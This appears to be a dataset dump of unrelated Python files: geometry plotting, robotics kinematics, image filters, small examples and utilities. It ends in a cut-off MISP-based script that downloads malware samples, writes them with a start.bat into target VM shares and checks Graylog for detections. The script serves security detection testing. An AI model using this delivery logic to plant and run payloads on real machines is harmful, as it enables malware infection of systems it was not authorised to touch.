| content (string, lengths 0 to 1.05M) | origin (string, 2 classes) | type (string, 2 classes) |
|---|---|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2021 Scott Weaver
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Calculate the distance between two concentric ellipses, one of which has been rotated.
"""
import os
import sys
import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
# ----------
# Default values
# a is the radius along the x-axis (sometimes shown as h)
# b is the radius along the y-axis (sometimes shown as v)
# first (the outside) ellipse
a1=6.5
b1=6.0
# second (inner) rotated ellipse
a2=6.0
b2=5.0
# angles
T=20 # inner ellipse rotation angle
lT=T # line of intersection angle
# ----------
# check for obvious issues
def check_for_issues():
if T == 90 and a2 == b1:
sys.stderr.write("WARNING: " +
"The horizontal and vertical radii are equal and " +
"will result in a divide by zero runtime error." + os.linesep)
# ----------
# Calculate y for a line passing through x at an angle t.
# This is for a line passing through the origin (0, 0).
# The angle t is in degrees.
def get_position_y_at_angle(x, t):
trad = math.radians(t)
return math.tan(trad)*x
def get_position_x_at_angle(y, t):
trad = math.radians(t)
return y / math.tan(trad)
# ----------
# rational representation: https://en.wikipedia.org/wiki/Ellipse
# This method was used just for fun.
# a: horizontal radius
def get_ellipse_x_rational(u, a):
x = a * (1 - u**2) / (u**2 + 1)
return x
# b: vertical radius
def get_ellipse_y_rational(u, b):
y = (2*b*u) / (u**2 + 1)
return y
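# Note (added): the rational parameter u corresponds to tan(t/2) of the standard
# parametric angle t, so sweeping u over a wide range covers the whole ellipse
# except the single point (-a, 0); that is why main() uses u in [-1000, 1000).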
# ----------
# Standard parametric representation: https://en.wikipedia.org/wiki/Ellipse
def get_ellipse_x_standard(t, a):
return a * (math.cos(math.radians(t)))
def get_ellipse_y_standard(t, b):
return b * (math.sin(math.radians(t)))
# ----------
# rotate ellipse
def get_ellipse_x_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
x = (a * math.cos(trad) * math.cos(rrad)) - (b * math.sin(trad) * math.sin(rrad))
return x
def get_ellipse_y_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
y = (a * math.cos(trad) * math.sin(rrad)) + (b * math.sin(trad) * math.cos(rrad))
return y
# ----------
# The intersection of a line and an ellipse
def get_line_ellipse_x_intercept_standard(t, a, b):
# trad = math.radians(t)
# n=a**2 * b**2
# d=b**2 + (a**2 * math.tan(trad)**2)
# x = math.sqrt(n/d)
# # make sure we're in the right quadrant
# if lT > 90 and lT < 270:
# x*=-1
# return x
return get_line_ellipse_x_intercept_rotated(t, a, b, 0)
# ----------
# The intersection of line and rotated ellipse (at the origin)
# http://quickcalcbasic.com/ellipse%20line%20intersection.pdf
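# Sketch of the derivation (paraphrased from the reference above): substituting
# the line y = m*x into the rotated-ellipse equation and collecting powers of x
# gives a quadratic A*x**2 + B*x + C = 0. A line through the origin has zero
# intercept, so B = 0 and the positive root is x = sqrt(-C/A); the quadrant is
# then fixed by the sign flip below.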
def get_line_ellipse_x_intercept_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
m = math.tan(trad)
if t == 90 or t == 270:
x = get_line_ellipse_y_intercept_rotated(t, a, b, r, 0)
else:
A = b**2 * (math.cos(rrad)**2 + 2 * m * math.cos(rrad) * math.sin(rrad) + m**2 * math.sin(rrad)**2) \
+ a**2 * (m**2 * math.cos(rrad)**2 - 2 * m * math.cos(rrad) * math.sin(rrad) + math.sin(rrad)**2)
B = 0 # all drops out b/c b1=0 in y=mx+b1
C = -1 * a**2 * b**2
# quadratic eq.
x = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
# make sure we're in the correct quadrant
if t > 90 and t <= 270:
x*=-1
return x
# ---------
def get_line_ellipse_y_intercept_rotated(t, a, b, r, x):
rrad = math.radians(r)
A = b**2 * math.sin(rrad)**2 + a**2 * math.cos(rrad)**2
B = 2 * x * math.cos(rrad) * math.sin(rrad) * (b**2 - a**2)
C = x**2 * (b**2 * math.cos(rrad)**2 + a**2 * math.sin(rrad)**2) - a**2 * b**2
# quadratic eq.
y = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
return get_position_x_at_angle(y, t)
# --------
def main():
check_for_issues()
# setup the plot
plt.figure(figsize=(8, 5))
gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
ax0 = plt.subplot(gs[0])
ax1 = plt.subplot(gs[1])
ax0.set_title("Concentric Ellipses")
ax1.set_title("Distance between Ellipses")
ax1.set_xlabel("Degrees")
ax0.set_xlim(-1*(a1+1), a1+1)
ax0.set_ylim(-1*(b1+1), b1+1)
# plot a line at set angle
vect_get_position_y_at_angle = np.vectorize(get_position_y_at_angle, excluded='x')
x1 = np.arange(-1*a1, a1+1, 1.0)
ax0.plot(x1, vect_get_position_y_at_angle(x1, lT), color='red')
# Display the second (inner) ellipse before it's rotated (just for fun)
u = np.arange(-1000, 1000, 0.1)
ax0.plot(get_ellipse_x_rational(u, a2), get_ellipse_y_rational(u, b2), color='lightgray')
# plot the first ellipse (not rotated)
vect_get_ellipse_x_standard = np.vectorize(get_ellipse_x_standard, excluded='a')
vect_get_ellipse_y_standard = np.vectorize(get_ellipse_y_standard, excluded='b')
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_standard(t, a1), vect_get_ellipse_y_standard(t, b1), color='orange')
# plot the second ellipse, rotated
vect_get_ellipse_x_rotated = np.vectorize(get_ellipse_x_rotated, excluded=['a', 'b', 'r'])
vect_get_ellipse_y_rotated = np.vectorize(get_ellipse_y_rotated, excluded=['a', 'b', 'r'])
t = np.arange(0, 360, 0.01)
ax0.plot(vect_get_ellipse_x_rotated(t, a2, b2, T), vect_get_ellipse_y_rotated(t, a2, b2, T), color='blue')
# plot 2 points along the line of intersection
# plot the point of intersection with the first ellipse (not rotated)
vect_get_line_ellipse_x_intercept_standard = np.vectorize(get_line_ellipse_x_intercept_standard, excluded=['a', 'b'])
x=get_line_ellipse_x_intercept_standard(lT, a1, b1)
y=get_position_y_at_angle(x, lT)
print ("green: %f,%f" % (x,y))
# should be a green dot on the orange ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='green')
# plot the point of intersection with the second ellipse (rotated)
vect_get_line_ellipse_x_intercept_rotated = np.vectorize(get_line_ellipse_x_intercept_rotated, excluded=['a', 'b', 'r'])
x=get_line_ellipse_x_intercept_rotated(lT, a2, b2, T)
y=get_position_y_at_angle(x, lT)
print ("black: %f,%f" % (x,y))
# should be a black dot on the blue ellipse intersecting the red line
ax0.plot(x, y, 'ro', color='black')
# ----------
# calculate the difference between the two ellipses
t = np.arange(0, 360, 0.1)
xnorm=vect_get_line_ellipse_x_intercept_standard(t, a1, b1)
ynorm=vect_get_position_y_at_angle(xnorm, t)
xrot=vect_get_line_ellipse_x_intercept_rotated(t, a2, b2, T)
yrot=vect_get_position_y_at_angle(xrot, t)
# find the diff and when the inner is outside the outer ellipse preserve the sign
# (np.sign avoids the divide-by-zero that (xnorm-xrot)/abs(xnorm-xrot) hits where the curves touch)
vect_hypot = np.vectorize(math.hypot)
diff = vect_hypot(xnorm-xrot, ynorm-yrot) * np.sign(xnorm - xrot)
ax1.plot(t, diff, color='pink')
# ----------
ax0.set_aspect('equal', 'box')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='irobot',
version='1.0.0b3',
description="Python implementation of iRobot's Open Interface",
long_description=long_description,
url='http://blog.lemoneerlabs.com',
author='Matthew Witherwax (lemoneer)',
author_email='mwax@lemoneerlabs.com',
# Choose your license
license='MIT',
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='robotics irobot roomba',
packages=find_packages(),
install_requires=['pyserial', 'six'],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
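# For example (added note), after `pip install .` this configuration produces a
# `create2` command on PATH that calls irobot.console_interfaces.create2:main;
# pip builds the appropriate wrapper script or .exe launcher per platform.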
entry_points={
'console_scripts': [
'create2=irobot.console_interfaces.create2:main'
],
},
)
|
nilq/baby-python
|
python
|
from helperfunctions_plot import *
from plane_relative import *
from denavit_hartenberg140 import *
import itertools as it
def work_it(M, func=n.diff, axis=1):
return np.apply_along_axis(func, axis, arr=M)
def get_closest_solutions_pair(s0, s1):
## diff_list = []
## index_list0 = []
## index_list1 = []
## for i0, k in enumerate(s0):
## for i1, l in enumerate(s1):
## diff_list.append(k-l)
## index_list0.append(i0)
## index_list1.append(i1)
## index_list0 = mat(index_list0)
## index_list1 = mat(index_list1)
## diff_list = mat(diff_list)
## norm_list = mat(map(norm, diff_list))
## t = (norm_list - min(norm_list)) == 0.0
## index0 = index_list0[t][0]
## index1 = index_list1[t][0]
## return mat((s0[index0], s1[index1]))
data = []
for i, s0i in enumerate(s0):
for j, s1j in enumerate(s1):
data.append([norm(s0i - s1j, ord = None), i, j])
data = mat(data)
ret = []
solution_col_row_pairs = n.argwhere(data == data.min(axis = 0)[0])
solution_indices = solution_col_row_pairs[:,0]
for solution_data in data[solution_indices]:
norm_value, i, j = solution_data
pair = mat([s0[i], s1[j]])
return pair
def get_closest_solution(s0, s):
diff_list = []
index_list1 = []
for i1, l in enumerate(s):
diff_list.append(s0-l)
index_list1.append(i1)
index_list1 = mat(index_list1)
diff_list = mat(diff_list)
norm_list = mat(map(norm, diff_list))
t = (norm_list - min(norm_list)) == 0.0
index1 = index_list1[t][0]
return s[index1]
def add_solutions(solutions, solution_value, index=5):
for s in solutions.T:
tmp1 = s.copy()
tmp2 = s.copy()
old_val = s[index]
tmp1[index] = old_val + solution_value
yield tmp1
tmp2[index] = old_val - solution_value
yield tmp2
def traverse_solutions(*args):
for solutions in args:
for s in solutions.T:
yield s
def make_array(list_of):
return mat(list_of).T
if __name__ == '__main__':
for count in n.linspace(-180,180,10):
ax, fig = init_plot()
fig.clear()
j1 = 180 #rand_range(-180, 180)
j2 = 0#rand_range(-90, 110)
j3 = 0#rand_range(-230, 50)
j4 = 0#rand_range(-200, 200)
j5 = 0#rand_range(-115, 115)
j6 = 0#rand_range(-400, 400)
j1,j2,j3,j4,j5,j6 = (-140.0, -14.35476839088895, 20.6520766452779, 0, 0, 0)
joint_values = j1,j2,j3,j4,j5,j6
T44, debug = forward_kinematics(*joint_values, **DH_TABLE)
sol = inverse_kinematics_irb140(DH_TABLE, T44)
plane0 = define_plane_from_angles([0,0,0],0, 0, 0)
global_robot = matmul_series(*debug)
global_robot.insert(0, debug[0])
global_robot.insert(0, plane0)
global_robot = mat(global_robot)
global_robot_points = global_robot[:,:3,3]
point_matrix = generate_symmetric_curve()
point_matrix_tf = get_transformed_points(T44, point_matrix)
######
ax = fig.add_subplot(1,2,1, projection='3d')
for p in global_robot:
plot_plane(ax, p, '--',scale_factor=0.1)
ax.scatter(point_matrix_tf[:,0],point_matrix_tf[:,1],point_matrix_tf[:,2])
ax.plot(global_robot_points[:,0], global_robot_points[:,1], global_robot_points[:,2],'k',linewidth=2)
plot_equal_perspective(ax, [-0.5,0.5],[-0.5,0.5],[0,1])
#show()
######
plane = global_robot[-1]
s = point_matrix_tf
all_solutions = []
for p in s:
T44 = n.zeros((4,4))
T44[:,3] = p
T44[:3,:3] = plane[:3,:3]
solutions = inverse_kinematics_irb140(DH_TABLE, T44)
solutions = filter_solutions(solutions)
print solutions.T.shape
all_solutions.append(solutions.T)
a = mat(all_solutions)
import time
start = time.time()
#### l = []
#### for i in xrange(len(a)-1):
#### l.append(get_closest_solutions_pair(a[i], a[i+1]))
#### l = mat(l)
sol = []
pair = get_closest_solutions_pair(a[0],a[1])
sol.append(pair[0])
for i in xrange(1,len(a)):
sol.append(get_closest_solution(sol[i-1],a[i]))
sol = mat(sol)
## s = list(l[:,0,:])
## s.append(l[-1,1,:])
## s = mat(s)
print 'stop: %0.2f' % (time.time() - start)
r = work_it(work_it(sol, func=diff, axis=0),func=norm, axis=1)
#r = n.max(n.abs(n.diff(sol,axis=0)),axis=1)
## if (r >= 180.0).any():
## print r
## print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
## import pdb; pdb.set_trace()
ax0 = fig.add_subplot(1,2,2)
ax0.plot(n.linspace(0,360,49),r);
xlabel('curve angle')
ylabel('solution distance')
show()
break
print n.round(n.max(n.abs(work_it(sol, func=diff, axis=0)),0))
#show()
#plot(n.max(abs(s-sol), axis=1)); show()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Author: 王林清, 2021/10/31 18:44
FileName: lunyu.py in shiyizhonghua_resource
Tools: PyCharm, Python 3.8.4
"""
from util import get_time_str, save_split_json, get_json
if __name__ == '__main__':
author = {
'name': '孔子',
'time': '春秋',
'desc': '孔子(公元前551年9月28日~公元前479年4月11'
'日),子姓,孔氏,名丘,字仲尼,鲁国陬邑(今山东省曲阜市)'
'人,祖籍宋国栗邑(今河南省夏邑县),中国古代伟大的思想家、'
'政治家、教育家,儒家学派创始人、“大成至圣先师”。 '
}
datas = []
data = get_json(r'./../data/lunyu/lunyu.json')
for dic in data:
time = get_time_str()
datas.append({
'title': f"论语·{dic['chapter']}",
'author': author,
'type': '古文',
'content': dic['paragraphs'],
'create_time': time,
'update_time': time,
'valid_delete': True
})
save_split_json('lunyu', datas)
|
nilq/baby-python
|
python
|
import cv2 as cv
import os
import numpy as np
class Cartonifier:
def __init__(self, n_downsampling_steps=2, n_filtering_steps=7):
self.num_down = n_downsampling_steps
self.num_bilateral = n_filtering_steps
# def process_folder(self, input_folder, output_folder):
# if not os.path.exists(input_folder):
# raise FileNotFoundError('Input folder {} not found'.format(input_folder))
# if not os.path.exists(output_folder):
# raise FileNotFoundError('Output folder {} not found'.format(output_folder))
# file_path_list = fu.get_absolute_path_list(input_folder)
# for file_path in file_path_list:
# self.process(file_path, output_folder)
def process(self, image, max_value=200):
img_rgb = image
# downsample image using Gaussian pyramid
img_color = img_rgb
for _ in range(self.num_down):
img_color = cv.pyrDown(img_color)
# repeatedly apply small bilateral filter instead of
# applying one large filter
for _ in range(self.num_bilateral):
img_color = cv.bilateralFilter(img_color, d=9, sigmaColor=9, sigmaSpace=7)
# upsample image to original size
for _ in range(self.num_down):
img_color = cv.pyrUp(img_color)
# convert to grayscale and apply median blur
img_gray = cv.cvtColor(img_rgb, cv.COLOR_RGB2GRAY)
img_blur = cv.medianBlur(img_gray, 7)
# detect and enhance edges
img_edge = self.edge_detection_v1(img_blur, max_value)
if img_color.shape[0] != img_edge.shape[0] or img_color.shape[1] != img_edge.shape[1]:
img_color = cv.resize(img_color, (img_edge.shape[1], img_edge.shape[0]))
img_cartoon = cv.bitwise_and(img_color, img_edge)
return img_cartoon
def edge_detection_v1(self, img_blur, max_value):
img_edge = cv.adaptiveThreshold(img_blur, max_value,
cv.ADAPTIVE_THRESH_MEAN_C,
cv.THRESH_BINARY,
blockSize=9,
C=4)
# convert back to color, bit-AND with color image
img_edge = cv.cvtColor(img_edge, cv.COLOR_GRAY2RGB)
return img_edge
# def process_image(self, src):
# self.alpha += 0.01
# if self.alpha > 1:
# self.alpha = 0
# self.current_model += 1
# if self.current_model >= len(self.model_list):
# self.current_model = 1
#
# # Edge detection
# img_edge = self.edge_detection_v2(src)
#
# # Coloured image from ML models
# img_colors = self.feed_forward(src)
#
# # Compose layers
# img_blend = np.clip(((1 - self.beta) * (img_colors - img_edge * 0.1) + self.beta * self.frame).astype(np.uint8),
# 0, 255)
#
# # Blur for smooth effect
# dst = cv.GaussianBlur(img_blend, (5, 5), cv.BORDER_DEFAULT)
# return dst
#
# def edge_detection_v2(self, src):
# dst = cv.GaussianBlur(src, (5, 5), cv.BORDER_DEFAULT)
# dst = cv.Canny(dst, 50, 200)
# # dst = self.edge_detection_v1(dst)
# dst = cv.cvtColor(dst, cv.COLOR_GRAY2RGB)
# dst = np.ones_like(dst) * 255 - dst
# return dst
if __name__ == '__main__':
c = Cartonifier()
# process() takes an image array, not a path; the output filename is an assumed example
cartoon = c.process(cv.imread("/Users/gilbert/Desktop/test.jpg"))
cv.imwrite("/Users/gilbert/Desktop/out/cartoon.jpg", cartoon)
|
nilq/baby-python
|
python
|
"""
AR : conditional covariance based Granger Causality
===================================================
This example reproduces the results of Ding et al. 2006 :cite:`ding2006granger`,
where Fig. 3 shows an indirect transfer of information from Y->X that is
mediated by Z. With plain Granger causality a Y->X transfer appears even though
it is only indirect; with conditional Granger causality, conditioning on the
past of the other sources suppresses this indirect transfer.
import numpy as np
from frites import set_mpl_style
from frites.simulations import StimSpecAR
from frites.conn import conn_covgc
import matplotlib.pyplot as plt
set_mpl_style()
###############################################################################
# Simulate 3 nodes 40hz oscillations
# ----------------------------------
#
# Here, we use the class :class:`frites.simulations.StimSpecAR` to simulate an
# stimulus-specific autoregressive model made of three nodes (X, Y and Z). This
# network simulates a transfer Y->Z and Z->X such as an indirect transfer from
# Y->X mediated by Z
ar_type = 'ding_3_indirect' # 40hz oscillations
n_stim = 2 # number of stimulus
n_epochs = 50 # number of epochs per stimulus
ss = StimSpecAR()
ar = ss.fit(ar_type=ar_type, n_epochs=n_epochs, n_stim=n_stim)
###############################################################################
# plot the network
plt.figure(figsize=(5, 4))
ss.plot_model()
plt.show()
###############################################################################
# Compute the Granger-Causality
# -----------------------------
#
# We first compute the Granger Causality and then the conditional Granger
# causality (i.e conditioning by the past coming from other sources)
dt, lag, step = 50, 5, 2
t0 = np.arange(lag, ar.shape[-1] - dt, step)
kw_gc = dict(dt=dt, lag=lag, step=1, t0=t0, roi='roi', times='times',
n_jobs=-1)
# granger causality
gc = conn_covgc(ar, conditional=False, **kw_gc)
# conditional granger causality
gc_cond = conn_covgc(ar, conditional=True, **kw_gc)
###############################################################################
# Plot the Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc)
plt.tight_layout()
plt.show()
###############################################################################
# Plot the conditional Granger causality
plt.figure(figsize=(12, 10))
ss.plot_covgc(gc_cond)
plt.tight_layout()
plt.show()
###############################################################################
# Direct comparison
# -----------------
#
# In this plot, we only select the transfer of information from Y->X for both
# granger and conditional granger causality
# select Y->X and mean per stimulus for the granger causality
gc_yx = gc.sel(roi='x-y', direction='y->x').groupby('trials').mean('trials')
gc_yx = gc_yx.rename({'trials': 'stimulus'})
# select Y->X and mean per stimulus for the conditional granger causality
gc_cond_yx = gc_cond.sel(roi='x-y', direction='y->x').groupby('trials').mean(
'trials')
gc_cond_yx = gc_cond_yx.rename({'trials': 'stimulus'})
# get (min, max) of granger causality from Y->X
gc_min = min(gc_yx.data.min(), gc_cond_yx.data.min())
gc_max = max(gc_yx.data.max(), gc_cond_yx.data.max())
# sphinx_gallery_thumbnail_number = 4
plt.figure(figsize=(10, 5))
# plot granger causality from Y->X
plt.subplot(121)
gc_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Granger causality Y$\rightarrow$X', fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
# plot the conditional granger causality from Y->X
plt.subplot(122)
gc_cond_yx.plot.line(x='times', hue='stimulus')
plt.title(r'Conditional Granger causality Y$\rightarrow$X|others',
fontweight='bold')
plt.axvline(0, color='k', lw=2)
plt.ylim(gc_min, gc_max)
plt.tight_layout()
plt.show()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# Solution to Mega Contest 1 Problem: Sell Candies
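# Greedy idea (added note): sell the most expensive candies first; each sale
# raises the discount applied to every later candy by 1, and a candy whose
# price falls below the discount contributes nothing. For example, prices
# [5, 4, 1] sorted descending earn 5 + (4 - 1) + max(1 - 2, 0) = 8.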
for testcase in range(int(input())):
net_revenue = 0
n = int(input())
vals = list(map(int, input().split()))
vals.sort(reverse=True)
cost_reduction = 0
for val in vals:
net_revenue += max(val-cost_reduction, 0)
net_revenue %= int(1e9+7)
cost_reduction += 1
print(net_revenue)
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------------------
# DT-MIL
# Copyright (c) 2021 Tencent. All Rights Reserved.
# ------------------------------------------------------------------------
def build_dataset(image_set, args):
from .wsi_feat_dataset import build as build_wsi_feat_dataset
return build_wsi_feat_dataset(image_set, args)
|
nilq/baby-python
|
python
|
from .misc import (
camel_to_underscore,
convert_date,
convert_datetime,
dict_from_dataframe,
dir_list,
download_if_new,
get_ulmo_dir,
mkdir_if_doesnt_exist,
module_with_dependency_errors,
module_with_deprecation_warnings,
open_file_for_url,
parse_fwf,
raise_dependency_error,
save_pretty_printed_xml,
)
try:
from .pytables import (
get_default_h5file_path,
get_or_create_group,
get_or_create_table,
open_h5file,
update_or_append_sortable,
)
except ImportError:
get_default_h5file_path = raise_dependency_error
get_or_create_group = raise_dependency_error
get_or_create_table = raise_dependency_error
open_h5file = raise_dependency_error
update_or_append_sortable = raise_dependency_error
|
nilq/baby-python
|
python
|
from flask import Flask
from flask import make_response
app = Flask(__name__)
@app.route('/')
def index():
response = make_response('<h1>This document carries a cookie!</h1>')
response.set_cookie('answer', '42')
return response
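# Hedged companion example (added; not part of the original snippet): the cookie
# set above can be read back on a later request through flask.request.cookies.
from flask import request

@app.route('/read')
def read_cookie():
    answer = request.cookies.get('answer', 'not set')
    return '<h1>The answer cookie is: {}</h1>'.format(answer)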
if __name__ == '__main__':
app.run()
|
nilq/baby-python
|
python
|
#!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from key import *
import json
import time
import os
from urllib.parse import urljoin
import sys
import traceback
from shutil import copyfile
import logging.handlers
from urllib.parse import quote
import argparse
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.SysLogHandler(address='/dev/log')
formatter = logging.Formatter('APTC: [%(levelname)s][%(filename)s:%(funcName)s():line %(lineno)s] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
# ensure prefix ends with /
conf_target_path_prefix = '/opt/aptc/targets/' # in case of changing path
conf_script_path_prefix = os.path.dirname(os.path.realpath(__file__)) + '/' # change to /opt/pec later
conf_vm_wait_sec = 60 * 5
conf_poll_sleep_interval_sec = 2
conf_graylog_poll_timeout_sec = 60 * 1
conf_tag_prefix = 'aptc:'
target_query_strings = {} # hostname:query_string
def init(url, key):
return PyMISP(url, key, False, 'json', False)
def get_all_target_host_names(test_case):
host_names = []
share_paths = get_all_target_share_paths(test_case)
for t in share_paths:
hn = t.split('/')
host_names.append(hn[len(hn)-1])
return host_names
def get_all_target_share_paths(test_case):
share_paths = []
targets = get_related_targets(test_case)
for t in targets:
share_paths.append(t['Event']['info'])
return share_paths
def get_related_targets(test_case):
targets = []
if 'RelatedEvent' not in str(test_case):
return targets
for re in test_case['Event']['RelatedEvent']:
if re['Event']['info'].startswith(conf_target_path_prefix):
targets.append(re)
return targets
def get_all_query_strings(m, testcase_id=0):
found = False
r = m.search(eventid=testcase_id)
if 'Tag' not in str(r):
logger.error(str(r))
return found
for e in r['response']:
for t in e['Event']['Tag']:
if t['name'] != conf_tag_prefix + 'test-in-progress':
continue
found = True
related = get_related_targets(e)
for r in related:
if r['Event']['info'] in target_query_strings:
continue
qs = get_target_query_string(m, r['Event']['id'])
target_query_strings[r['Event']['info']] = qs
return found
def write_payload(m, payload_id, test_case):
status, samples = m.download_samples(False, payload_id)
if not status:
return status
share_paths = get_all_target_share_paths(test_case)
total_sample_count = len(samples)
for vm_path in share_paths:
sample_counter = 0
for sample in samples:
sample_counter += 1
filepath = vm_path + '/' + sample[1]
with open(filepath, 'wb') as out:
try:
out.write(sample[2].read())
logger.debug('wrote: ' + filepath)
sample[2].seek(0) # otherwise next target will get a 0 byte file
if sample_counter == total_sample_count:
get_start_bat(m, payload_id, vm_path)
except OSError:
logger.error('fail writing ' + filepath)
continue
if sample_counter == 1: # tag only the first sample
tag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.debug('tagged ' + str(payload_id) + ' with ' + conf_tag_prefix + 'test-in-progress')
hostname = vm_path.replace(conf_target_path_prefix, '')
newtag = conf_tag_prefix + '{"target":"' + hostname + '","testcase-id":'
newtag += str(test_case['Event']['id']) + ',"filename":"' + sample[1] + '"}'
m.new_tag(newtag, '#000000', True)
tag(m, payload_id, newtag)
return status
def get_payload_tags(test_case):
t = []
if 'Tag' not in str(test_case):
return t
if 'Tag' in test_case['Event']:
for et in test_case["Event"]["Tag"]:
if et['name'].startswith(conf_tag_prefix + 'payload'):
t.append(et['name'])
return t
def find_tag(m, eid, tag):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return False
if 'Tag' in r['response'][0]['Event']:
for t in r['response'][0]['Event']['Tag']:
if t['name'].startswith(tag):
return True
return False
def get_all_tags(m, eid):
r = m.search(eventid=eid)
if 'Tag' not in str(r):
return []
if 'Tag' in r['response'][0]['Event']:
return r['response'][0]['Event']['Tag']
return []
def dump(r):
print(json.dumps(r, indent=2))
def wait_for_targets(m, payload_id, test_case):
timeout_sec = conf_vm_wait_sec
all_vm = get_all_target_host_names(test_case)
while len(all_vm) > 0:
for vm in all_vm:
tags = get_all_tags(m, payload_id) # payload may have old results
tags_str = str(tags)
if 'result_' in tags_str and vm in tags_str:
if vm in all_vm:
all_vm.remove(vm)
if len(all_vm) == 0:
break
time.sleep(conf_poll_sleep_interval_sec)
timeout_sec -= conf_poll_sleep_interval_sec
if timeout_sec <= 0:
logger.error('abort due to timeout')
exit()
untag(m, payload_id, conf_tag_prefix + 'test-in-progress')
logger.info('All VM(s) done for payload-' + str(payload_id))
def tag(m, eid, tagname):
try:
r = m.get_event(eid)
m.tag(r['Event']['uuid'], tagname)
logger.debug('tag event ' + str(eid) + ' with ' + str(tagname))
except:
logger.debug(traceback.format_exc())
return True
def untag(m, eid, tagname):
r = m.search(eventid=eid)
if 'uuid' not in str(r):
logger.error(str(r))
return False
uuid = r['response'][0]['Event']['uuid']
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.debug('untagged ' + tagname + ' from ' + uuid)
m.untag(uuid, t['id'])
return True
def delete_tag(m, eventid, tagname):
r = m.search(eventid=eventid)
if 'Tag' not in str(r):
logger.error(str(r))
return
for t in r['response'][0]['Event']['Tag']:
if t['name'] == tagname:
logger.info('found tagid ' + t['id'])
session = m._PyMISP__prepare_session()
url = urljoin(m.root_url, 'tags/delete/{}'.format(t['id']))
session.post(url)
return
def get_target_query_string(m, target_id):
r = m.search(eventid=target_id)
if 'Attribute' not in str(r):
return ''
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].startswith('graylog'):
return a['value']
return ''
def create_n_tag(m, eventid, tagname, tagcolor):
m.new_tag(tagname, tagcolor, True)
tag(m, eventid, tagname)
def get_start_bat(m, payload_id, target_path):
r = m.search(eventid=payload_id)
if 'Attribute' not in str(r):
logger.error(str(r))
return
for a in r['response'][0]['Event']['Attribute']:
if a['comment'].lower() != 'start.bat':
continue
with open(target_path + '/start.bat', 'w') as out:
try:
out.write(a['value'])
logger.info('wrote: ' + target_path + '/start.bat')
except:
logger.error('fail writing start.bat for payload ' + str(payload_id))
return
return
def query_graylog(m, query, filename=''):
session = m._PyMISP__prepare_session() # I know this is bad thing...
url = query
if len(filename) == 0:
url = url.replace('FILENAME%20AND%20', '')
else:
url = url.replace('FILENAME', quote(filename))
response = session.get(url)
r = json.loads(response.text)
return int(r['total_results'])
def get_reboot_wait_query(m, target_id):
q = ''
r = m.search(eventid=target_id)
if 'id' not in str(r):
return q
for e in r['response']:
for a in e['Event']['Attribute']:
if 'reboot' in a['comment']:
q = a['value']
break
return q
def rollback_targets(m, test_case):
target_paths = {}
wait_vm = []
wait_sec = conf_vm_wait_sec
if 'RelatedEvent' not in str(test_case):
return
if len(test_case['Event']['RelatedEvent']) == 0:
return
logger.info('starting target roll-back...')
for rt in test_case['Event']['RelatedEvent']:
if rt['Event']['info'].startswith(conf_target_path_prefix):
target_paths[rt['Event']['info']] = get_reboot_wait_query(m, rt['Event']['id'])
if len(target_paths[rt['Event']['info']]) > 0:
copyfile(conf_target_path_prefix + 'shutdown.bat', rt['Event']['info'] + '/start.bat')
wait_vm.append(rt['Event']['info'])
logger.info('waiting for target reboot...')
while len(wait_vm) > 0:
for k, v in target_paths.items():
